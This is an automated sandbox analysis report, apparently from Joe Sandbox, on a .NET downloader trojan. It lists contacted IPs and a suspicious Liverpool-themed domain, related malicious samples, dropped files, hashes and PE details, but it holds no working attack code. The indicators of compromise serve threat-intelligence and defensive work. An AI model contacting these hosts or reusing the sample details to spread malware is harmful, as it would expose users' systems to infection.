                                              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              87.251.79.157
                                              		unknownRussian Federation
                                              		20803RISS-ASRUtrue
                                              172.67.197.219
                                              		liverpooldabestteamoftheworld.comUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              Private

                                              IP
                                              192.168.2.1

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:368924
                                              Start date:15.03.2021
                                              Start time:19:59:49
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 31s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:SecuriteInfo.com.Trojan.DownloaderNET.131.2724.22120 (renamed file extension from 22120 to exe)
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@9/7@2/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 14.3% (good quality ratio 12.9%)
                                              • Quality average: 71.5%
                                              • Quality standard deviation: 33.4%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • HTTP Packets have been reduced
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.42.151.234, 13.64.90.137, 40.88.32.150, 23.57.80.111
                                              • Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, blobcollector.events.data.trafficmanager.net, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              20:01:01API Interceptor127x Sleep call for process: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe modified
                                              20:01:11API Interceptor1x Sleep call for process: WerFault.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              172.67.197.219ORDER-21031566AF.exeGet hashmaliciousBrowse
                                              • liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D11DF1C300FC464DC26536C8476FF3AC.html
                                              Inv_495045_0956.exeGet hashmaliciousBrowse
                                              • liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1617C0AF37A58C53412C31983B0B8569.html
                                              proposal and quotation.docGet hashmaliciousBrowse
                                              • liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-DD4D37EC2398DF4D4F5ED60C617DC794.html
                                              Payment Details_ 11-03-21.jarGet hashmaliciousBrowse
                                              • liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FCB5112E956162EC0C7B3853038F097A.html

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              liverpooldabestteamoftheworld.comBank swift copy(1)pdf.exeGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              ORDER-21031566AF.exeGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              PO_21031566AF_pdf.jarGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              Inv_495045_0956.exeGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              SecuriteInfo.com.Trojan.Siggen12.39743.30812.exeGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              proposal and quotation.docGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              payment.exeGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              Payment Details_ 11-03-21.jarGet hashmaliciousBrowse
                                              • 172.67.197.219

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              CLOUDFLARENETUSSecuriteInfo.com.BackDoor.SpyBotNET.25.23901.exeGet hashmaliciousBrowse
                                              • 104.21.19.200
                                              Bank swift copy(1)pdf.exeGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              Purchase Order 03.15.21.exeGet hashmaliciousBrowse
                                              • 172.67.153.81
                                              SecuriteInfo.com.Trojan.GenericKD.45870665.2596.dllGet hashmaliciousBrowse
                                              • 104.20.184.68
                                              SecuriteInfo.com.Trojan.KillProc2.15168.28356.dllGet hashmaliciousBrowse
                                              • 104.20.184.68
                                              SecuriteInfo.com.Variant.Razy.847374.25991.dllGet hashmaliciousBrowse
                                              • 104.20.185.68
                                              SecuriteInfo.com.Trojan.GenericKD.45888713.13347.dllGet hashmaliciousBrowse
                                              • 104.20.184.68
                                              Company Reference1.docGet hashmaliciousBrowse
                                              • 172.67.188.154
                                              IcedID.dllGet hashmaliciousBrowse
                                              • 104.20.185.68
                                              44270.7082388889.dllGet hashmaliciousBrowse
                                              • 104.20.185.68
                                              #Ud83d#Udd0aVN797.wavv-copy.htmGet hashmaliciousBrowse
                                              • 104.22.51.93
                                              #U260f480504.htmGet hashmaliciousBrowse
                                              • 104.18.10.207
                                              138.dllGet hashmaliciousBrowse
                                              • 104.20.184.68
                                              10000000.dllGet hashmaliciousBrowse
                                              • 104.20.184.68
                                              51134248.exeGet hashmaliciousBrowse
                                              • 172.67.188.154
                                              New_Message_caroline.vogel@axpo.comSecured.htmlGet hashmaliciousBrowse
                                              • 104.16.18.94
                                              Cheque Deposit Confirmation.exeGet hashmaliciousBrowse
                                              • 172.67.188.154
                                              ORDER-21031566AF.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              PO_21031566AF_pdf.jarGet hashmaliciousBrowse
                                              • 104.21.52.98
                                              GZNST5FR.exeGet hashmaliciousBrowse
                                              • 172.67.188.154

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.BackDoor.SpyBotNET.25.23901.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              Bank swift copy(1)pdf.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              51134248.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              Cheque Deposit Confirmation.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              ORDER-21031566AF.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              PO_21031566AF_pdf.jarGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              GZNST5FR.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              Inv_495045_0956.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SecuriteInfo.com.Trojan.PackedNET.568.709.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SecuriteInfo.com.Trojan.PackedNET.568.18624.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SecuriteInfo.com.Trojan.PackedNET.568.20062.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SecuriteInfo.com.Trojan.PackedNET.568.17135.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SecuriteInfo.com.Trojan.Win32.Save.a.30042.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SecuriteInfo.com.Trojan.Siggen12.39743.30812.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              payment.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              Cheque Deposit Confirmation.pdf.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              m3yYHUA2Uc.exeGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              Payment Details_ 11-03-21.jarGet hashmaliciousBrowse
                                              • 172.67.197.219
                                              SS Encrypter.exeGet hashmaliciousBrowse
                                              • 172.67.197.219

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ED5QJTUK1HDK4BEQ_6ec071164c53d865d187d5df52bc346c96ac7210_85fd9878_177cef95\Report.wer
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):17172
                                              Entropy (8bit):3.764206112710957
                                              Encrypted:false
                                              SSDEEP:192:BgkBdNomHBUZMXyaKeD6UyDW/u7sdS274It07:VB3pBUZMXyasL6/u7sdX4It07
                                              MD5:09A60554DB34CC345E91CADDE92CAF87
                                              SHA1:1BB84BE654AE344B623A7D518AD2ADC752D0E338
                                              SHA-256:15649F2FF122EEA66E88299B070FB15A6E39773E6E679583E9DB48616DAE9795
                                              SHA-512:FA4A285BE21D99C114D426FF5C64376E5399105F2BD2BCEE9EAA207FAA4E83239EE3369A628795FAADB12672E2F67B496212956EED51F7D2A8A56EF382DBD886
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.0.3.3.7.2.6.1.4.0.1.7.8.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.0.3.3.7.2.6.9.6.0.4.9.0.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.4.2.a.c.c.7.-.b.e.0.e.-.4.3.f.b.-.8.a.5.3.-.1.d.3.d.c.f.f.1.8.6.d.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.8.f.6.1.6.6.-.a.b.8.5.-.4.5.7.8.-.a.7.4.a.-.d.0.f.8.b.e.d.e.d.5.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...D.o.w.n.l.o.a.d.e.r.N.E.T...1.3.1...2.7.2.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.0.-.0.0.0.1.-.0.0.1.6.-.5.b.8.1.-.d.c.8.f.1.0.1.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.3.5.4.d.a.4.9.f.f.4.f.3.8.c.2.f.f.7.b.6.0.e.4.f.6.d.e.9.0.2.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.e.2.b.8.b.3.b.f.2.0.2.4.c.f.8.a.3.b.d.d.7.e.d.e.0.c.e.
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8B4.tmp.dmp
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 15 streams, Tue Mar 16 03:01:05 2021, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):318235
                                              Entropy (8bit):3.668321330308574
                                              Encrypted:false
                                              SSDEEP:3072:Fo9Zp0bnjd+ph+lT5k8dCwRdiTbInU9gIOgF5Br40so0UCgUqrlzBrknM8Tc:FC00ph+R5fdiTbIU9RpDOPo0TjoLknMd
                                              MD5:28C863F4FCD112F82BAB66B2B9DFA1B1
                                              SHA1:898E9C3C833B28BAA7874B537B03EF1D09C025F7
                                              SHA-256:41BB3205FE14DE0041465869DCF101967A9E6DE84E41685459C1921EB787D21E
                                              SHA-512:F287D66A53468D8A4E67217884B9DAD8599601E073B90EC7DE6A7D5F3BB19B7670D74F4D3ADB129E2D8C04753D387068256B1FBB7A1F16B8EE5F3E1EEDCBECF6
                                              Malicious:false
                                              Reputation:low
                                              Preview: MDMP....... .......q.P`...................U...........B......./......GenuineIntelW...........T...........^.P`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCAA.tmp.WERInternalMetadata.xml
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8444
                                              Entropy (8bit):3.7041334331595737
                                              Encrypted:false
                                              SSDEEP:192:Rrl7r3GLNi9v6BF7dg6YIISUY4FlgmfZ/dSqCprg89b7MsfCJm:RrlsNi16BFm6YXSUY4XgmfbSP7ff1
                                              MD5:CD7EBD6A3193C61FE34CC69E4FDF9E5C
                                              SHA1:3C27B8C3A5A951C43A5A2916651DD502945100CA
                                              SHA-256:852E28B62E1597FA6A0360B4E5370AF730F056766BB72F07A57C33DE92A76587
                                              SHA-512:CCFA8F93E0A4D4BF270D49AF980D513D57B39357425A932010DF05A6FD96624268FAF8CC2DC5A7A8DBBF6E100871505F71862CD5AA08A0B38D6C99AF62BB4DC4
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.7.6.<./.P.i.d.>.......
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF99.tmp.xml
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4841
                                              Entropy (8bit):4.569739677169856
                                              Encrypted:false
                                              SSDEEP:48:cvIwSD8zsUJgtWI9rjWSC8B4R8fm8M4JYyFFF+q8vfy8ClsIsd:uITfS4SSNtJYAKfFClsIsd
                                              MD5:3BA2F85495BF7B459F65BF41415C6E0C
                                              SHA1:01E2E1745A6FEAE2A793E3AF6CF87DA88FF216E3
                                              SHA-256:6BC11954E3E5191BF65BF927496AA7B961EFA238B6414794773E6B7174855FA0
                                              SHA-512:D8ADE265BB8A65BEE9101038CDA126FE84E96CE1E713564388F3F3FC7F831C847196EEB4854FC04EE34E0283FABD2B5EEC808ADFE7FD7DC74A7587BC37B305A3
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="903611" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                              C:\Users\user\AppData\Local\?????????_Inc\SecuriteInfo.com.Trojan.D_Url_l3waih5gwfnhtnkotbdiqibdkxw1gm4o\7.76.506.352\jmbtz0t1.newcfg
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):575474
                                              Entropy (8bit):3.1026951900295114
                                              Encrypted:false
                                              SSDEEP:6144:36YvEqXbr/2Ej41oWUpdi45fOULXwfr388N7xWGr9jodCWs4//HTH5Rdt2jJ54Lp:36iE4quXwfrMKlow4nHn+J5rQYt2
                                              MD5:0880B7F75557720A1A600FE4BDA9883D
                                              SHA1:A1E49A92589D9862E1B9B0692CBB4C980640ABEB
                                              SHA-256:D0F2C5164B79212C661C1248F82FB66FFD53FE55D24033E77DC1329E8BCD79D4
                                              SHA-512:EDB8EB7C4FE20DEFF1B9AC0148B4AB9EF946235D4CBB80924A27BE6910C761BE0428DD8138529ECDC1DFFD59167975C9F5168B1BF632AC5034A5EAC6F442F8DA
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="............................_xAB0C__xAB3A__xAB1B__xAB36__xAB3D__xAB12__xAB30__xAB1B__xAB14__xAB2A__xAB2C__xAB11__xAB12__xAB3C__xAB0D__xAB25__xAB13_" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <............................_xAB0C__xAB3A__xAB1B__xAB36__xAB3D__xAB12__xAB30__xAB1B__xAB14__xAB2A__xAB2C__xAB11__xAB12__xAB3C__xAB0D__xAB25__xAB13_>.. <setting name="........
                                              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):24111
                                              Entropy (8bit):0.6763061048363382
                                              Encrypted:false
                                              SSDEEP:12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeN:d
                                              MD5:4A7951952E3A71A87A3AD069CF74E9CE
                                              SHA1:B1D39EB31A4B41A0B8AB35EE295FC985C9C16269
                                              SHA-256:AF981B7F2133C39C2A63CCCFFA531E475D900BB0D78F97F93E371D8E765D9065
                                              SHA-512:657792AC9BAAB3914E630C4FC266C0DA96F3AB326985B41B9C1761ECA70506BD69CEC83EAF58F86B272911FB358364267BC66FCBEDF95F66151BD2BC090AED18
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user..............

                                              Static File Info

                                              General

                                              File type:
                                              Entropy (8bit):4.745833393708009
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File size:433664
                                              MD5:968e090b17ce57156a66188b4db032ba
                                              SHA1:de2b8b3bf2024cf8a3bdd7ede0ce86bb5a7b13de
                                              SHA256:62562b38c8055ca3d5143c759d1fe6e946e0b3a85bf4397b056589d3c271392c
                                              SHA512:026b053a6405302926b6e24dbfa7941a255b71258546d4b93fac0681806a935fd5a8459e6f6fa14317f0eabef8c3dfafb1bebd346f3b6412eb9142c39cf7f2a9
                                              SSDEEP:6144:qCi27P8//mMgWFwOLyw1esyC6gcG6Li6dYs5n0evECRfwEWN9kp0gi:Ji27P8//mZWFwAyw1e
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x46b00e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0xCBF103ED [Sat Jun 4 12:07:09 2078 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6afb40x57.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x60c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x690140x69200False0.106985266795data4.74374955129IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x6c0000x60c0x800False0.34521484375data4.89513334519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
